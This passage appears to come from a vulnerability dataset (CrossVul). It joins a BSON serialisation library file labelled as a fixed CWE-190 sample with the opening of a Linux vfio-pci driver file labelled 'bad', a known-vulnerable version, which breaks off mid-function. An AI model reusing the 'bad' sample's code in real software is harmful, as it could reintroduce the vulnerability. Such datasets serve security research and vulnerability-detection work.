return bson_iterator_double_raw( i ) != 0;
case BSON_EOO:
case BSON_NULL:
return 0;
default:
return 1;
}
}
MONGO_EXPORT const char *bson_iterator_string( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_STRING:
case BSON_SYMBOL:
return bson_iterator_value( i ) + 4;
default:
return "";
}
}
int bson_iterator_string_len( const bson_iterator *i ) {
return bson_iterator_int_raw( i );
}
MONGO_EXPORT const char *bson_iterator_code( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_STRING:
case BSON_CODE:
return bson_iterator_value( i ) + 4;
case BSON_CODEWSCOPE:
return bson_iterator_value( i ) + 8;
default:
return NULL;
}
}
MONGO_EXPORT void bson_iterator_code_scope( const bson_iterator *i, bson *scope ) {
if ( bson_iterator_type( i ) == BSON_CODEWSCOPE ) {
int code_len;
bson_little_endian32( &code_len, bson_iterator_value( i )+4 );
bson_init_data( scope, ( void * )( bson_iterator_value( i )+8+code_len ) );
_bson_reset( scope );
scope->finished = 1;
}
else {
bson_empty( scope );
}
}
MONGO_EXPORT bson_date_t bson_iterator_date( const bson_iterator *i ) {
return bson_iterator_long_raw( i );
}
MONGO_EXPORT time_t bson_iterator_time_t( const bson_iterator *i ) {
return bson_iterator_date( i ) / 1000;
}
MONGO_EXPORT int bson_iterator_bin_len( const bson_iterator *i ) {
return ( bson_iterator_bin_type( i ) == BSON_BIN_BINARY_OLD )
? bson_iterator_int_raw( i ) - 4
: bson_iterator_int_raw( i );
}
MONGO_EXPORT char bson_iterator_bin_type( const bson_iterator *i ) {
return bson_iterator_value( i )[4];
}
MONGO_EXPORT const char *bson_iterator_bin_data( const bson_iterator *i ) {
return ( bson_iterator_bin_type( i ) == BSON_BIN_BINARY_OLD )
? bson_iterator_value( i ) + 9
: bson_iterator_value( i ) + 5;
}
MONGO_EXPORT const char *bson_iterator_regex( const bson_iterator *i ) {
return bson_iterator_value( i );
}
MONGO_EXPORT const char *bson_iterator_regex_opts( const bson_iterator *i ) {
const char *p = bson_iterator_value( i );
return p + strlen( p ) + 1;
}
MONGO_EXPORT void bson_iterator_subobject( const bson_iterator *i, bson *sub ) {
bson_init_data( sub, ( char * )bson_iterator_value( i ) );
_bson_reset( sub );
sub->finished = 1;
}
MONGO_EXPORT void bson_iterator_subiterator( const bson_iterator *i, bson_iterator *sub ) {
bson_iterator_from_buffer( sub, bson_iterator_value( i ) );
}
/* ----------------------------
BUILDING
------------------------------ */
static void _bson_init_size( bson *b, int size ) {
if( size == 0 )
b->data = NULL;
else
b->data = ( char * )bson_malloc( size );
b->dataSize = size;
b->cur = b->data + 4;
_bson_reset( b );
}
MONGO_EXPORT void bson_init( bson *b ) {
_bson_init_size( b, initialBufferSize );
}
void bson_init_size( bson *b, int size ) {
_bson_init_size( b, size );
}
static void bson_append_byte( bson *b, char c ) {
b->cur[0] = c;
b->cur++;
}
static void bson_append( bson *b, const void *data, size_t len ) {
memcpy( b->cur , data , len );
b->cur += len;
}
static void bson_append32( bson *b, const void *data ) {
bson_little_endian32( b->cur, data );
b->cur += 4;
}
static void bson_append32_as_int( bson *b, int data ) {
bson_little_endian32( b->cur, &data );
b->cur += 4;
}
static void bson_append64( bson *b, const void *data ) {
bson_little_endian64( b->cur, data );
b->cur += 8;
}
int bson_ensure_space( bson *b, const size_t bytesNeeded ) {
int pos = b->cur - b->data;
char *orig = b->data;
int new_size;
if ( pos + bytesNeeded <= b->dataSize )
return BSON_OK;
new_size = 1.5 * ( b->dataSize + bytesNeeded );
if( new_size < b->dataSize ) {
if( ( b->dataSize + bytesNeeded ) < INT_MAX )
new_size = INT_MAX;
else {
b->err = BSON_SIZE_OVERFLOW;
return BSON_ERROR;
}
}
b->data = bson_realloc( b->data, new_size );
if ( !b->data )
bson_fatal_msg( !!b->data, "realloc() failed" );
b->dataSize = new_size;
b->cur += b->data - orig;
return BSON_OK;
}
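/*
 * Illustrative note (editorial addition, not part of the original driver
 * source): the growth policy above expands the buffer to 1.5x of
 * (current size + requested bytes). For example, with dataSize = 256,
 * cur at offset 250 and bytesNeeded = 16, the check 250 + 16 > 256
 * triggers a realloc to new_size = 1.5 * (256 + 16) = 408 bytes, and
 * cur is rebased onto the new allocation.
 */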
MONGO_EXPORT int bson_finish( bson *b ) {
int i;
if( b->err & BSON_NOT_UTF8 )
return BSON_ERROR;
if ( ! b->finished ) {
if ( bson_ensure_space( b, 1 ) == BSON_ERROR ) return BSON_ERROR;
bson_append_byte( b, 0 );
i = ( int )( b->cur - b->data );
bson_little_endian32( b->data, &i );
b->finished = 1;
}
return BSON_OK;
}
MONGO_EXPORT void bson_destroy( bson *b ) {
if (b) {
bson_free( b->data );
b->err = 0;
b->data = 0;
b->cur = 0;
b->finished = 1;
}
}
static int bson_append_estart( bson *b, int type, const char *name, const size_t dataSize ) {
const int len = strlen( name ) + 1;
if ( b->finished ) {
b->err |= BSON_ALREADY_FINISHED;
return BSON_ERROR;
}
if ( bson_ensure_space( b, 1 + len + dataSize ) == BSON_ERROR ) {
return BSON_ERROR;
}
if( bson_check_field_name( b, ( const char * )name, len - 1 ) == BSON_ERROR ) {
bson_builder_error( b );
return BSON_ERROR;
}
bson_append_byte( b, ( char )type );
bson_append( b, name, len );
return BSON_OK;
}
/* ----------------------------
BUILDING TYPES
------------------------------ */
MONGO_EXPORT int bson_append_int( bson *b, const char *name, const int i ) {
if ( bson_append_estart( b, BSON_INT, name, 4 ) == BSON_ERROR )
return BSON_ERROR;
bson_append32( b , &i );
return BSON_OK;
}
MONGO_EXPORT int bson_append_long( bson *b, const char *name, const int64_t i ) {
if ( bson_append_estart( b , BSON_LONG, name, 8 ) == BSON_ERROR )
return BSON_ERROR;
bson_append64( b , &i );
return BSON_OK;
}
MONGO_EXPORT int bson_append_double( bson *b, const char *name, const double d ) {
if ( bson_append_estart( b, BSON_DOUBLE, name, 8 ) == BSON_ERROR )
return BSON_ERROR;
bson_append64( b , &d );
return BSON_OK;
}
MONGO_EXPORT int bson_append_bool( bson *b, const char *name, const bson_bool_t i ) {
if ( bson_append_estart( b, BSON_BOOL, name, 1 ) == BSON_ERROR )
return BSON_ERROR;
bson_append_byte( b , i != 0 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_null( bson *b, const char *name ) {
if ( bson_append_estart( b , BSON_NULL, name, 0 ) == BSON_ERROR )
return BSON_ERROR;
return BSON_OK;
}
MONGO_EXPORT int bson_append_undefined( bson *b, const char *name ) {
if ( bson_append_estart( b, BSON_UNDEFINED, name, 0 ) == BSON_ERROR )
return BSON_ERROR;
return BSON_OK;
}
static int bson_append_string_base( bson *b, const char *name,
const char *value, size_t len, bson_type type ) {
size_t sl = len + 1;
if ( bson_check_string( b, ( const char * )value, sl - 1 ) == BSON_ERROR )
return BSON_ERROR;
if ( bson_append_estart( b, type, name, 4 + sl ) == BSON_ERROR ) {
return BSON_ERROR;
}
bson_append32_as_int( b , ( int )sl );
bson_append( b , value , sl - 1 );
bson_append( b , "\0" , 1 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_string( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_STRING );
}
MONGO_EXPORT int bson_append_symbol( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_SYMBOL );
}
MONGO_EXPORT int bson_append_code( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_CODE );
}
MONGO_EXPORT int bson_append_string_n( bson *b, const char *name, const char *value, size_t len ) {
return bson_append_string_base( b, name, value, len, BSON_STRING );
}
MONGO_EXPORT int bson_append_symbol_n( bson *b, const char *name, const char *value, size_t len ) {
return bson_append_string_base( b, name, value, len, BSON_SYMBOL );
}
MONGO_EXPORT int bson_append_code_n( bson *b, const char *name, const char *value, size_t len ) {
return bson_append_string_base( b, name, value, len, BSON_CODE );
}
MONGO_EXPORT int bson_append_code_w_scope_n( bson *b, const char *name,
const char *code, size_t len, const bson *scope ) {
size_t sl, size;
if ( !scope ) return BSON_ERROR;
sl = len + 1;
size = 4 + 4 + sl + bson_size( scope );
if ( bson_append_estart( b, BSON_CODEWSCOPE, name, size ) == BSON_ERROR )
return BSON_ERROR;
bson_append32_as_int( b, ( int )size );
bson_append32( b, &sl );
bson_append( b, code, sl );
bson_append( b, scope->data, bson_size( scope ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_code_w_scope( bson *b, const char *name, const char *code, const bson *scope ) {
return bson_append_code_w_scope_n( b, name, code, strlen ( code ), scope );
}
MONGO_EXPORT int bson_append_binary( bson *b, const char *name, char type, const char *str, size_t len ) {
if ( type == BSON_BIN_BINARY_OLD ) {
int subtwolen = len + 4;
if ( bson_append_estart( b, BSON_BINDATA, name, 4+1+4+len ) == BSON_ERROR )
return BSON_ERROR;
bson_append32_as_int( b, ( int )subtwolen );
bson_append_byte( b, type );
bson_append32_as_int( b, ( int )len );
bson_append( b, str, len );
}
else {
if ( bson_append_estart( b, BSON_BINDATA, name, 4+1+len ) == BSON_ERROR )
return BSON_ERROR;
bson_append32_as_int( b, ( int )len );
bson_append_byte( b, type );
bson_append( b, str, len );
}
return BSON_OK;
}
MONGO_EXPORT int bson_append_oid( bson *b, const char *name, const bson_oid_t *oid ) {
if ( bson_append_estart( b, BSON_OID, name, 12 ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , oid , 12 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_new_oid( bson *b, const char *name ) {
bson_oid_t oid;
bson_oid_gen( &oid );
return bson_append_oid( b, name, &oid );
}
MONGO_EXPORT int bson_append_regex( bson *b, const char *name, const char *pattern, const char *opts ) {
const size_t plen = strlen( pattern )+1;
const size_t olen = strlen( opts )+1;
if ( bson_append_estart( b, BSON_REGEX, name, plen + olen ) == BSON_ERROR )
return BSON_ERROR;
if ( bson_check_string( b, pattern, plen - 1 ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , pattern , plen );
bson_append( b , opts , olen );
return BSON_OK;
}
MONGO_EXPORT int bson_append_bson( bson *b, const char *name, const bson *bson ) {
if ( !bson ) return BSON_ERROR;
if ( bson_append_estart( b, BSON_OBJECT, name, bson_size( bson ) ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , bson->data , bson_size( bson ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_element( bson *b, const char *name_or_null, const bson_iterator *elem ) {
bson_iterator next = *elem;
size_t size;
bson_iterator_next( &next );
size = next.cur - elem->cur;
if ( name_or_null == NULL ) {
if( bson_ensure_space( b, size ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b, elem->cur, size );
}
else {
size_t data_size = size - 2 - strlen( bson_iterator_key( elem ) );
bson_append_estart( b, elem->cur[0], name_or_null, data_size );
bson_append( b, bson_iterator_value( elem ), data_size );
}
return BSON_OK;
}
MONGO_EXPORT int bson_append_timestamp( bson *b, const char *name, bson_timestamp_t *ts ) {
if ( bson_append_estart( b, BSON_TIMESTAMP, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append32( b , &( ts->i ) );
bson_append32( b , &( ts->t ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_timestamp2( bson *b, const char *name, int time, int increment ) {
if ( bson_append_estart( b, BSON_TIMESTAMP, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append32( b , &increment );
bson_append32( b , &time );
return BSON_OK;
}
MONGO_EXPORT int bson_append_date( bson *b, const char *name, bson_date_t millis ) {
if ( bson_append_estart( b, BSON_DATE, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append64( b , &millis );
return BSON_OK;
}
MONGO_EXPORT int bson_append_time_t( bson *b, const char *name, time_t secs ) {
return bson_append_date( b, name, ( bson_date_t )secs * 1000 );
}
MONGO_EXPORT int bson_append_start_object( bson *b, const char *name ) {
if ( bson_append_estart( b, BSON_OBJECT, name, 5 ) == BSON_ERROR ) return BSON_ERROR;
b->stack[ b->stackPos++ ] = b->cur - b->data;
bson_append32( b , &zero );
return BSON_OK;
}
MONGO_EXPORT int bson_append_start_array( bson *b, const char *name ) {
if ( bson_append_estart( b, BSON_ARRAY, name, 5 ) == BSON_ERROR ) return BSON_ERROR;
b->stack[ b->stackPos++ ] = b->cur - b->data;
bson_append32( b , &zero );
return BSON_OK;
}
MONGO_EXPORT int bson_append_finish_object( bson *b ) {
char *start;
int i;
if ( bson_ensure_space( b, 1 ) == BSON_ERROR ) return BSON_ERROR;
bson_append_byte( b , 0 );
start = b->data + b->stack[ --b->stackPos ];
i = ( int )( b->cur - start );
bson_little_endian32( start, &i );
return BSON_OK;
}
MONGO_EXPORT double bson_int64_to_double( int64_t i64 ) {
return (double)i64;
}
MONGO_EXPORT int bson_append_finish_array( bson *b ) {
return bson_append_finish_object( b );
}
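/*
 * Illustrative usage sketch (editorial addition, not part of the original
 * driver source): building a small document with the append API defined
 * above. Field names and values are hypothetical; only bson_finish() is
 * checked for brevity. The function is unused and serves as documentation
 * only.
 */
static void bson_example_build_doc( void ) {
    bson b;
    bson_init( &b );                             /* allocate the default buffer */
    bson_append_string( &b, "name", "alice" );   /* BSON_STRING element */
    bson_append_int( &b, "age", 30 );            /* BSON_INT element */
    bson_append_start_object( &b, "address" );   /* open a nested document */
    bson_append_string( &b, "city", "Oslo" );
    bson_append_finish_object( &b );             /* back-patch the nested length */
    if ( bson_finish( &b ) == BSON_OK ) {
        /* b.data now holds the serialized document; its total length is
           stored little-endian in the first four bytes. */
    }
    bson_destroy( &b );                          /* free the buffer */
}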
/* Error handling and allocators. */
static bson_err_handler err_handler = NULL;
MONGO_EXPORT bson_err_handler set_bson_err_handler( bson_err_handler func ) {
bson_err_handler old = err_handler;
err_handler = func;
return old;
}
MONGO_EXPORT void bson_free( void *ptr ) {
bson_free_func( ptr );
}
MONGO_EXPORT void *bson_malloc( size_t size ) {
void *p;
p = bson_malloc_func( size );
bson_fatal_msg( !!p, "malloc() failed" );
return p;
}
void *bson_realloc( void *ptr, size_t size ) {
void *p;
p = bson_realloc_func( ptr, size );
bson_fatal_msg( !!p, "realloc() failed" );
return p;
}
int _bson_errprintf( const char *format, ... ) {
va_list ap;
int ret = 0;
va_start( ap, format );
#ifndef R_SAFETY_NET
ret = vfprintf( stderr, format, ap );
#endif
va_end( ap );
return ret;
}
/**
* This method is invoked when a non-fatal bson error is encountered.
* Calls the error handler if available.
*
* @param b the bson object on which the builder error occurred.
*/
void bson_builder_error( bson *b ) {
if( err_handler )
err_handler( "BSON error." );
}
void bson_fatal( int ok ) {
bson_fatal_msg( ok, "" );
}
void bson_fatal_msg( int ok , const char *msg ) {
if ( ok )
return;
if ( err_handler ) {
err_handler( msg );
}
#ifndef R_SAFETY_NET
bson_errprintf( "error: %s\n" , msg );
exit( -5 );
#endif
}
/* Efficiently copy an integer to a string. */
extern const char bson_numstrs[1000][4];
void bson_numstr( char *str, int i ) {
if( i < 1000 )
memcpy( str, bson_numstrs[i], 4 );
else
bson_sprintf( str,"%d", i );
}
MONGO_EXPORT void bson_swap_endian64( void *outp, const void *inp ) {
const char *in = ( const char * )inp;
char *out = ( char * )outp;
out[0] = in[7];
out[1] = in[6];
out[2] = in[5];
out[3] = in[4];
out[4] = in[3];
out[5] = in[2];
out[6] = in[1];
out[7] = in[0];
}
MONGO_EXPORT void bson_swap_endian32( void *outp, const void *inp ) {
const char *in = ( const char * )inp;
char *out = ( char * )outp;
out[0] = in[3];
out[1] = in[2];
out[2] = in[1];
out[3] = in[0];
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3983_1 |
crossvul-cpp_data_bad_5375_0 | /*
* Copyright (C) 2012 Red Hat, Inc. All rights reserved.
* Author: Alex Williamson <alex.williamson@redhat.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* Derived from original vfio:
* Copyright 2010 Cisco Systems, Inc. All rights reserved.
* Author: Tom Lyon, pugs@cisco.com
*/
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/device.h>
#include <linux/eventfd.h>
#include <linux/file.h>
#include <linux/interrupt.h>
#include <linux/iommu.h>
#include <linux/module.h>
#include <linux/mutex.h>
#include <linux/notifier.h>
#include <linux/pci.h>
#include <linux/pm_runtime.h>
#include <linux/slab.h>
#include <linux/types.h>
#include <linux/uaccess.h>
#include <linux/vfio.h>
#include <linux/vgaarb.h>
#include "vfio_pci_private.h"
#define DRIVER_VERSION "0.2"
#define DRIVER_AUTHOR "Alex Williamson <alex.williamson@redhat.com>"
#define DRIVER_DESC "VFIO PCI - User Level meta-driver"
static char ids[1024] __initdata;
module_param_string(ids, ids, sizeof(ids), 0);
MODULE_PARM_DESC(ids, "Initial PCI IDs to add to the vfio driver, format is \"vendor:device[:subvendor[:subdevice[:class[:class_mask]]]]\" and multiple comma separated entries can be specified");
static bool nointxmask;
module_param_named(nointxmask, nointxmask, bool, S_IRUGO | S_IWUSR);
MODULE_PARM_DESC(nointxmask,
"Disable support for PCI 2.3 style INTx masking. If this resolves problems for specific devices, report lspci -vvvxxx to linux-pci@vger.kernel.org so the device can be fixed automatically via the broken_intx_masking flag.");
#ifdef CONFIG_VFIO_PCI_VGA
static bool disable_vga;
module_param(disable_vga, bool, S_IRUGO);
MODULE_PARM_DESC(disable_vga, "Disable VGA resource access through vfio-pci");
#endif
static bool disable_idle_d3;
module_param(disable_idle_d3, bool, S_IRUGO | S_IWUSR);
MODULE_PARM_DESC(disable_idle_d3,
"Disable using the PCI D3 low power state for idle, unused devices");
static DEFINE_MUTEX(driver_lock);
static inline bool vfio_vga_disabled(void)
{
#ifdef CONFIG_VFIO_PCI_VGA
return disable_vga;
#else
return true;
#endif
}
/*
* Our VGA arbiter participation is limited since we don't know anything
* about the device itself. However, if the device is the only VGA device
* downstream of a bridge and VFIO VGA support is disabled, then we can
* safely return legacy VGA IO and memory as not decoded since the user
* has no way to get to it and routing can be disabled externally at the
* bridge.
*/
static unsigned int vfio_pci_set_vga_decode(void *opaque, bool single_vga)
{
struct vfio_pci_device *vdev = opaque;
struct pci_dev *tmp = NULL, *pdev = vdev->pdev;
unsigned char max_busnr;
unsigned int decodes;
if (single_vga || !vfio_vga_disabled() || pci_is_root_bus(pdev->bus))
return VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM |
VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM;
max_busnr = pci_bus_max_busnr(pdev->bus);
decodes = VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM;
while ((tmp = pci_get_class(PCI_CLASS_DISPLAY_VGA << 8, tmp)) != NULL) {
if (tmp == pdev ||
pci_domain_nr(tmp->bus) != pci_domain_nr(pdev->bus) ||
pci_is_root_bus(tmp->bus))
continue;
if (tmp->bus->number >= pdev->bus->number &&
tmp->bus->number <= max_busnr) {
pci_dev_put(tmp);
decodes |= VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM;
break;
}
}
return decodes;
}
static inline bool vfio_pci_is_vga(struct pci_dev *pdev)
{
return (pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA;
}
static void vfio_pci_probe_mmaps(struct vfio_pci_device *vdev)
{
struct resource *res;
int bar;
struct vfio_pci_dummy_resource *dummy_res;
INIT_LIST_HEAD(&vdev->dummy_resources_list);
for (bar = PCI_STD_RESOURCES; bar <= PCI_STD_RESOURCE_END; bar++) {
res = vdev->pdev->resource + bar;
if (!IS_ENABLED(CONFIG_VFIO_PCI_MMAP))
goto no_mmap;
if (!(res->flags & IORESOURCE_MEM))
goto no_mmap;
/*
* The PCI core shouldn't set up a resource with a
* type but zero size. But there may be bugs that
* cause us to do that.
*/
if (!resource_size(res))
goto no_mmap;
if (resource_size(res) >= PAGE_SIZE) {
vdev->bar_mmap_supported[bar] = true;
continue;
}
if (!(res->start & ~PAGE_MASK)) {
/*
* Add a dummy resource to reserve the remainder
* of the exclusive page in case a hot-added
* device's BAR is assigned into it.
*/
dummy_res = kzalloc(sizeof(*dummy_res), GFP_KERNEL);
if (dummy_res == NULL)
goto no_mmap;
dummy_res->resource.name = "vfio sub-page reserved";
dummy_res->resource.start = res->end + 1;
dummy_res->resource.end = res->start + PAGE_SIZE - 1;
dummy_res->resource.flags = res->flags;
if (request_resource(res->parent,
&dummy_res->resource)) {
kfree(dummy_res);
goto no_mmap;
}
dummy_res->index = bar;
list_add(&dummy_res->res_next,
&vdev->dummy_resources_list);
vdev->bar_mmap_supported[bar] = true;
continue;
}
/*
* Here we don't handle the case when the BAR is not page
* aligned because we can't expect the BAR will be
* assigned into the same location in a page in guest
* when we passthrough the BAR. And it's hard to access
* this BAR in userspace because we have no way to get
* the BAR's location in a page.
*/
no_mmap:
vdev->bar_mmap_supported[bar] = false;
}
}
static void vfio_pci_try_bus_reset(struct vfio_pci_device *vdev);
static void vfio_pci_disable(struct vfio_pci_device *vdev);
/*
* INTx masking requires the ability to disable INTx signaling via PCI_COMMAND
* _and_ the ability to detect when the device is asserting INTx via PCI_STATUS.
* If a device implements the former but not the latter we would typically
* expect broken_intx_masking to be set and require an exclusive interrupt.
* However since we do have control of the device's ability to assert INTx,
* we can instead pretend that the device does not implement INTx, virtualizing
* the pin register to report zero and maintaining DisINTx set on the host.
*/
static bool vfio_pci_nointx(struct pci_dev *pdev)
{
switch (pdev->vendor) {
case PCI_VENDOR_ID_INTEL:
switch (pdev->device) {
/* All i40e (XL710/X710) 10/20/40GbE NICs */
case 0x1572:
case 0x1574:
case 0x1580 ... 0x1581:
case 0x1583 ... 0x1589:
case 0x37d0 ... 0x37d2:
return true;
default:
return false;
}
}
return false;
}
static int vfio_pci_enable(struct vfio_pci_device *vdev)
{
struct pci_dev *pdev = vdev->pdev;
int ret;
u16 cmd;
u8 msix_pos;
pci_set_power_state(pdev, PCI_D0);
/* Don't allow our initial saved state to include busmaster */
pci_clear_master(pdev);
ret = pci_enable_device(pdev);
if (ret)
return ret;
vdev->reset_works = (pci_reset_function(pdev) == 0);
pci_save_state(pdev);
vdev->pci_saved_state = pci_store_saved_state(pdev);
if (!vdev->pci_saved_state)
pr_debug("%s: Couldn't store %s saved state\n",
__func__, dev_name(&pdev->dev));
if (likely(!nointxmask)) {
if (vfio_pci_nointx(pdev)) {
dev_info(&pdev->dev, "Masking broken INTx support\n");
vdev->nointx = true;
pci_intx(pdev, 0);
} else
vdev->pci_2_3 = pci_intx_mask_supported(pdev);
}
pci_read_config_word(pdev, PCI_COMMAND, &cmd);
if (vdev->pci_2_3 && (cmd & PCI_COMMAND_INTX_DISABLE)) {
cmd &= ~PCI_COMMAND_INTX_DISABLE;
pci_write_config_word(pdev, PCI_COMMAND, cmd);
}
ret = vfio_config_init(vdev);
if (ret) {
kfree(vdev->pci_saved_state);
vdev->pci_saved_state = NULL;
pci_disable_device(pdev);
return ret;
}
msix_pos = pdev->msix_cap;
if (msix_pos) {
u16 flags;
u32 table;
pci_read_config_word(pdev, msix_pos + PCI_MSIX_FLAGS, &flags);
pci_read_config_dword(pdev, msix_pos + PCI_MSIX_TABLE, &table);
vdev->msix_bar = table & PCI_MSIX_TABLE_BIR;
vdev->msix_offset = table & PCI_MSIX_TABLE_OFFSET;
vdev->msix_size = ((flags & PCI_MSIX_FLAGS_QSIZE) + 1) * 16;
} else
vdev->msix_bar = 0xFF;
if (!vfio_vga_disabled() && vfio_pci_is_vga(pdev))
vdev->has_vga = true;
if (vfio_pci_is_vga(pdev) &&
pdev->vendor == PCI_VENDOR_ID_INTEL &&
IS_ENABLED(CONFIG_VFIO_PCI_IGD)) {
ret = vfio_pci_igd_init(vdev);
if (ret) {
dev_warn(&vdev->pdev->dev,
"Failed to setup Intel IGD regions\n");
vfio_pci_disable(vdev);
return ret;
}
}
vfio_pci_probe_mmaps(vdev);
return 0;
}
static void vfio_pci_disable(struct vfio_pci_device *vdev)
{
struct pci_dev *pdev = vdev->pdev;
struct vfio_pci_dummy_resource *dummy_res, *tmp;
int i, bar;
/* Stop the device from further DMA */
pci_clear_master(pdev);
vfio_pci_set_irqs_ioctl(vdev, VFIO_IRQ_SET_DATA_NONE |
VFIO_IRQ_SET_ACTION_TRIGGER,
vdev->irq_type, 0, 0, NULL);
vdev->virq_disabled = false;
for (i = 0; i < vdev->num_regions; i++)
vdev->region[i].ops->release(vdev, &vdev->region[i]);
vdev->num_regions = 0;
kfree(vdev->region);
vdev->region = NULL; /* don't krealloc a freed pointer */
vfio_config_free(vdev);
for (bar = PCI_STD_RESOURCES; bar <= PCI_STD_RESOURCE_END; bar++) {
if (!vdev->barmap[bar])
continue;
pci_iounmap(pdev, vdev->barmap[bar]);
pci_release_selected_regions(pdev, 1 << bar);
vdev->barmap[bar] = NULL;
}
list_for_each_entry_safe(dummy_res, tmp,
&vdev->dummy_resources_list, res_next) {
list_del(&dummy_res->res_next);
release_resource(&dummy_res->resource);
kfree(dummy_res);
}
vdev->needs_reset = true;
/*
* If we have saved state, restore it. If we can reset the device,
* even better. Resetting with current state seems better than
* nothing, but saving and restoring current state without reset
* is just busy work.
*/
if (pci_load_and_free_saved_state(pdev, &vdev->pci_saved_state)) {
pr_info("%s: Couldn't reload %s saved state\n",
__func__, dev_name(&pdev->dev));
if (!vdev->reset_works)
goto out;
pci_save_state(pdev);
}
/*
* Disable INTx and MSI, presumably to avoid spurious interrupts
* during reset. Stolen from pci_reset_function()
*/
pci_write_config_word(pdev, PCI_COMMAND, PCI_COMMAND_INTX_DISABLE);
/*
* Try to reset the device. The success of this is dependent on
* being able to lock the device, which is not always possible.
*/
if (vdev->reset_works && !pci_try_reset_function(pdev))
vdev->needs_reset = false;
pci_restore_state(pdev);
out:
pci_disable_device(pdev);
vfio_pci_try_bus_reset(vdev);
if (!disable_idle_d3)
pci_set_power_state(pdev, PCI_D3hot);
}
static void vfio_pci_release(void *device_data)
{
struct vfio_pci_device *vdev = device_data;
mutex_lock(&driver_lock);
if (!(--vdev->refcnt)) {
vfio_spapr_pci_eeh_release(vdev->pdev);
vfio_pci_disable(vdev);
}
mutex_unlock(&driver_lock);
module_put(THIS_MODULE);
}
static int vfio_pci_open(void *device_data)
{
struct vfio_pci_device *vdev = device_data;
int ret = 0;
if (!try_module_get(THIS_MODULE))
return -ENODEV;
mutex_lock(&driver_lock);
if (!vdev->refcnt) {
ret = vfio_pci_enable(vdev);
if (ret)
goto error;
vfio_spapr_pci_eeh_open(vdev->pdev);
}
vdev->refcnt++;
error:
mutex_unlock(&driver_lock);
if (ret)
module_put(THIS_MODULE);
return ret;
}
static int vfio_pci_get_irq_count(struct vfio_pci_device *vdev, int irq_type)
{
if (irq_type == VFIO_PCI_INTX_IRQ_INDEX) {
u8 pin;
pci_read_config_byte(vdev->pdev, PCI_INTERRUPT_PIN, &pin);
if (IS_ENABLED(CONFIG_VFIO_PCI_INTX) && !vdev->nointx && pin)
return 1;
} else if (irq_type == VFIO_PCI_MSI_IRQ_INDEX) {
u8 pos;
u16 flags;
pos = vdev->pdev->msi_cap;
if (pos) {
pci_read_config_word(vdev->pdev,
pos + PCI_MSI_FLAGS, &flags);
return 1 << ((flags & PCI_MSI_FLAGS_QMASK) >> 1);
}
} else if (irq_type == VFIO_PCI_MSIX_IRQ_INDEX) {
u8 pos;
u16 flags;
pos = vdev->pdev->msix_cap;
if (pos) {
pci_read_config_word(vdev->pdev,
pos + PCI_MSIX_FLAGS, &flags);
return (flags & PCI_MSIX_FLAGS_QSIZE) + 1;
}
} else if (irq_type == VFIO_PCI_ERR_IRQ_INDEX) {
if (pci_is_pcie(vdev->pdev))
return 1;
} else if (irq_type == VFIO_PCI_REQ_IRQ_INDEX) {
return 1;
}
return 0;
}
static int vfio_pci_count_devs(struct pci_dev *pdev, void *data)
{
(*(int *)data)++;
return 0;
}
struct vfio_pci_fill_info {
int max;
int cur;
struct vfio_pci_dependent_device *devices;
};
static int vfio_pci_fill_devs(struct pci_dev *pdev, void *data)
{
struct vfio_pci_fill_info *fill = data;
struct iommu_group *iommu_group;
if (fill->cur == fill->max)
return -EAGAIN; /* Something changed, try again */
iommu_group = iommu_group_get(&pdev->dev);
if (!iommu_group)
return -EPERM; /* Cannot reset non-isolated devices */
fill->devices[fill->cur].group_id = iommu_group_id(iommu_group);
fill->devices[fill->cur].segment = pci_domain_nr(pdev->bus);
fill->devices[fill->cur].bus = pdev->bus->number;
fill->devices[fill->cur].devfn = pdev->devfn;
fill->cur++;
iommu_group_put(iommu_group);
return 0;
}
struct vfio_pci_group_entry {
struct vfio_group *group;
int id;
};
struct vfio_pci_group_info {
int count;
struct vfio_pci_group_entry *groups;
};
static int vfio_pci_validate_devs(struct pci_dev *pdev, void *data)
{
struct vfio_pci_group_info *info = data;
struct iommu_group *group;
int id, i;
group = iommu_group_get(&pdev->dev);
if (!group)
return -EPERM;
id = iommu_group_id(group);
for (i = 0; i < info->count; i++)
if (info->groups[i].id == id)
break;
iommu_group_put(group);
return (i == info->count) ? -EINVAL : 0;
}
static bool vfio_pci_dev_below_slot(struct pci_dev *pdev, struct pci_slot *slot)
{
for (; pdev; pdev = pdev->bus->self)
if (pdev->bus == slot->bus)
return (pdev->slot == slot);
return false;
}
struct vfio_pci_walk_info {
int (*fn)(struct pci_dev *, void *data);
void *data;
struct pci_dev *pdev;
bool slot;
int ret;
};
static int vfio_pci_walk_wrapper(struct pci_dev *pdev, void *data)
{
struct vfio_pci_walk_info *walk = data;
if (!walk->slot || vfio_pci_dev_below_slot(pdev, walk->pdev->slot))
walk->ret = walk->fn(pdev, walk->data);
return walk->ret;
}
static int vfio_pci_for_each_slot_or_bus(struct pci_dev *pdev,
int (*fn)(struct pci_dev *,
void *data), void *data,
bool slot)
{
struct vfio_pci_walk_info walk = {
